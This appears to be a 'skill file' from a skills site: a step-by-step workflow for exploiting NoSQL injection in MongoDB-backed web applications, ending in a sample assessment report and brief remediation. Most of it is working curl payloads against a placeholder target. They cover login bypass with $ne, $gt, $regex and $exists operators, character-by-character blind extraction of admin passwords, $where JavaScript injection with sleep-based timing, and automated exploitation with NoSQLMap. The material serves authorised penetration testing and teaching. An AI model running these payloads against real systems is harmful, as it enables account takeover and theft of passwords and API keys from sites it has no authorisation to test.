Exploiting Nosql Injection Vulnerabilities | Skills Pool
Skill File
Exploiting Nosql Injection Vulnerabilities
Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.
During web application penetration testing of applications using NoSQL databases
When testing authentication mechanisms backed by MongoDB or similar databases
When assessing APIs that accept JSON input for database queries
During bug bounty hunting on applications with NoSQL backends
When performing security code review of database query construction
Prerequisites
Burp Suite Professional or Community Edition with JSON support
NoSQLMap tool installed (pip install nosqlmap or from GitHub)
Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
Proxy configured for HTTP traffic interception
Python 3.x for custom payload scripting
Workflow
Step 1 — Identify NoSQL Injection Points
Related Skills
# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin\"", "password": "test"}'
# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"
# Check for error-based detection
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"query": {"$gt": ""}}'
Step 2 — Perform Authentication Bypass
# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'
# Bypass with $gt operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'
# Target specific user with regex
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": ".*"}}'
# Bypass using $exists operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$exists": true}, "password": {"$exists": true}}'
Step 3 — Extract Data Using Boolean-Based Blind Injection
# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": "^a"}}'
# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": "^ab"}}'
# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'
Step 4 — Exploit JavaScript Injection via $where
# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "this.username == \"admin\""}'
# Time-based detection with sleep
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "sleep(5000) || this.username == \"admin\""}'
# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "this.password.match(/^a/) != null"}'
Step 5 — Use NoSQLMap for Automated Testing
# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install
# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
--method POST \
--data '{"username":"test","password":"test"}'
# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'
Step 6 — Test URL Parameter Injection
# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"
# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"
# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
-H "X-User-Id: {'\$ne': null}"
Key Concepts
Concept
Description
Operator Injection
Injecting MongoDB operators ($ne, $gt, $regex) into query parameters
Authentication Bypass
Using operators to match any document and bypass login checks
Blind Extraction
Character-by-character data extraction using $regex boolean responses
$where Injection
Executing arbitrary JavaScript on the MongoDB server via $where operator
Type Juggling
Exploiting how NoSQL databases handle different input types (string vs object)
BSON Injection
Manipulating Binary JSON serialization in MongoDB wire protocol
Server-Side JS
JavaScript execution context available in MongoDB for query evaluation
Tools & Systems
Tool
Purpose
NoSQLMap
Automated NoSQL injection detection and exploitation framework
Burp Suite
HTTP proxy for intercepting and modifying JSON requests
MongoDB Shell
Direct database interaction for testing query behavior
nosqli
Dedicated NoSQL injection scanner and exploitation tool
PayloadsAllTheThings
Curated NoSQL injection payload repository
Nuclei
Template-based scanner with NoSQL injection detection templates
Postman
API testing platform for crafting NoSQL injection requests
Common Scenarios
Login Bypass — Bypass MongoDB-backed authentication using {"$ne": ""} operator injection in username and password fields
Data Enumeration — Extract database contents character by character using $regex blind injection when no direct output is visible
Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass
Output Format
## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)
### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |
### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator
### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls